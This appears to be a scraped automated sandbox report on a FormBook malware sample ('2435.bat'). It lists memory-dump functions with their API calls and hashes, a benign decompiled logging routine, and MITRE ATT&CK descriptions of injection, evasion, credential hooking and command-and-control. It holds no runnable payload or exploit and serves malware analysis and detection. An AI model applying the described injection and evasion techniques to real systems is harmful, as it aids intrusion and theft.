Opcode Fuzzy Hash: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
Instruction Fuzzy Hash: 6590027124100417F12171598504B07000997E4285F91C426E041556CD9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 04779840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477984A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
Instruction ID: e9182d5674df18e909ebbbe354946ca3a1ddf629a08fb0611876639156d16006
Opcode Fuzzy Hash: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
Instruction Fuzzy Hash: E8900271282041567555B15984049074006A7F4285791C026E1405964C8566E85AF661

Uniqueness

Uniqueness Score: -1.00%

Function 04779910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477991A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 478bcfdae1b57f3de11369c92c438c8d5993098611d7834981c84dee63299966
Instruction ID: 74aa8e86e2f7bb37929717a47a70ff237d1053beaa36617bd96d71a4dd707d8a
Opcode Fuzzy Hash: 478bcfdae1b57f3de11369c92c438c8d5993098611d7834981c84dee63299966
Instruction Fuzzy Hash: E09002B124100406F15071598404B46000597E4345F51C025E5055568E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 047799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047799AA

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3164e1acd64d050efa56df02e126c996f7025b9ba590d28258a871f74d7c9367
Instruction ID: 6eb0536df7aa76879015fc4e4c51f8e867ee5c2c6263e31910def88e0237a7e6
Opcode Fuzzy Hash: 3164e1acd64d050efa56df02e126c996f7025b9ba590d28258a871f74d7c9367
Instruction Fuzzy Hash: DB9002B138100446F11071598414F060005D7F5345F51C029E1055568D8659DC567166

Uniqueness

Uniqueness Score: -1.00%

Function 04779A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04779A5A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6511ed7942e651bbf6f9128f594b8f2b548ba181a5b8f66c1fc05159fa31484b
Instruction ID: da1b5b1533e02d3d9bfbded9e282c543c35d2a227b6d9b7ee6d109a17ad8b6ea
Opcode Fuzzy Hash: 6511ed7942e651bbf6f9128f594b8f2b548ba181a5b8f66c1fc05159fa31484b
Instruction Fuzzy Hash: EB90027125180046F21075698C14F07000597E4347F51C129E0145568CC955D8657561

Uniqueness

Uniqueness Score: -1.00%

Function 02FCA070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02FB3AF8), ref: 02FCA09D

Strings

.z`, xrefs: 02FCA08C, 02FCA098

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 70de76a94ae42188dc5d83336ae7925e3aac7b04287eb264ea0598f3c67699dd
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 00E046B1200208ABDB18EF99CC89EA777ADEF88750F118558FE086B241C631F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02FB82EA, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02FB834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02FB836B

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d805ba1e46ef74495d7e40f55282b07c402c5ca3b5094a973425aca124e70bdd
Instruction ID: 93e954c8785870ffb4a84d88b66c3f4762d5be0d2a01d67209892c84abef43db
Opcode Fuzzy Hash: d805ba1e46ef74495d7e40f55282b07c402c5ca3b5094a973425aca124e70bdd
Instruction Fuzzy Hash: 7D012832E802297AFB21A6959D02FFE772CAF40B91F154008FF04BA1C0E694650647E1

Uniqueness

Uniqueness Score: -1.00%

Function 02FB82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02FB834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02FB836B

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: 5bf18a97910389a51b851150e9ded0e270829d10717fc4b17998b494ea7e62e8
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 4B01F271A802287BE721A6999D02FFE772CAF40B91F154018FF04BA1C0E6A469064AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02FB82B4, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02FB834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02FB836B

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 806593ff2b28a98b5f6f960ce9fda001b8095b9029fb77e68690ce7ab28167fe
Instruction ID: b485c3d60bddff192bd868bb4381fbbc131cbd3f5e0e353db460ec9ac1de1a12
Opcode Fuzzy Hash: 806593ff2b28a98b5f6f960ce9fda001b8095b9029fb77e68690ce7ab28167fe
Instruction Fuzzy Hash: A4014972E8021476EA22AA95AC42FFE331DAF80FD1F1A0159FF04AB1C0E69569054AE1

Uniqueness

Uniqueness Score: -1.00%

Function 02FCA0DD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02FCA134

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a08032073799318443623ae3f431379b61d8d566bc5e0460e856ed145056896e
Instruction ID: e89e428f52a440160c5fe808b383a0a2a8b3f058d47eab41407efb8da08b7573
Opcode Fuzzy Hash: a08032073799318443623ae3f431379b61d8d566bc5e0460e856ed145056896e
Instruction Fuzzy Hash: E001A4B2210108BBCB54DF89DC81EEB77ADAF8C754F158258FA4D97240C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02FCA0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02FCA134

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 218e4fc95f5f148ce21c02f2cc8ca09ab7c99dc4dec27a97bf6ba4cf9921a97d
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 6B01AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02FCA1C1, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02FBF1A2,02FBF1A2,?,00000000,?,?), ref: 02FCA200

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 57feec71a1fb8b7225c7baf1dbde007b2319946838952b7b17768df68d6c12bb
Instruction ID: 5fb2b8372a3f0f916ed66d2cf4237aa8a29d6f659e810070ba4a358af8856dc6
Opcode Fuzzy Hash: 57feec71a1fb8b7225c7baf1dbde007b2319946838952b7b17768df68d6c12bb
Instruction Fuzzy Hash: 0801DCB16042087BEB14DFA4DC84DE777A9EF88260F04819DFE0C8B642DA34A8148BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02FCA030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02FC4506,?,02FC4C7F,02FC4C7F,?,02FC4506,?,?,?,?,?,00000000,00000000,?), ref: 02FCA05D

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 3ceb031dc44fe81b2336096d7c5fa2689193758e4380a29298f97c5be50136e0
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: B0E046B1200208ABDB18EF99CC81EA777ADEF88750F118558FE086B241C631F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02FCA1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02FBF1A2,02FBF1A2,?,00000000,?,?), ref: 02FCA200

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 6673d75035dbda92502c454f8a342dee6c3b4113a6082f002606843a43ce71cb
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: B9E01AB12002086BDB14DF49CC85EE737ADEF88650F118154BA0867241C931F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02FBF697, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02FB8CF4,?), ref: 02FBF6CB

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 6871598d5e345b460535cde8d49a0ebe1612cd98dae4b6078105a511d7e7b283
Instruction ID: 80e1d5a0740d986ab8639c4fc2ab27ce9352dda048ba3b2ba66802b9801610f8
Opcode Fuzzy Hash: 6871598d5e345b460535cde8d49a0ebe1612cd98dae4b6078105a511d7e7b283
Instruction Fuzzy Hash: 19E0C2656983052AE720ABB49C13F2377995F05654F4A00A8FA889A2C3DA90D0008662

Uniqueness

Uniqueness Score: -1.00%

Function 02FBF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02FB8CF4,?), ref: 02FBF6CB

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: a61670b893dfc87707b9edd5523267576623c2d559ed42e71e81f64fc11a1e1a
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 6AD0A7717903043BE610FBA59C03F6732CE5B44B44F490064FB48D73C3D950E4004565

Uniqueness

Uniqueness Score: -1.00%

Function 0477967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04779694

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
Instruction ID: f348a3b8e337c0aa3fd3521df3a537db9dca7cba57e5b53e0b4bb39d6b362390
Opcode Fuzzy Hash: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
Instruction Fuzzy Hash: D0B09BF19424C5C9FB11E7604608F17790077E4745F56C175D2024655A4778D095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 047CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E047CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0477CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E047C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E047C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x047cfdda
0x047cfde2
0x047cfde5
0x047cfdec
0x047cfdfa
0x047cfdff
0x047cfe0a
0x047cfe0f
0x047cfe17
0x047cfe1e
0x047cfe19
0x047cfe19
0x047cfe19
0x047cfe20
0x047cfe21
0x047cfe22
0x047cfe25
0x047cfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047CFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047CFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047CFE01

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
Instruction ID: 46021486248fe692521ec4119820fb3e66fe73dd92f8b430ebebee68d28c9f08
Opcode Fuzzy Hash: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
Instruction Fuzzy Hash: 2AF0F672240611BFEA201A55DC0AF23BB5AEB44730F24435CF628562E1EA62F86096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 2435.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 73351A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 733516DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

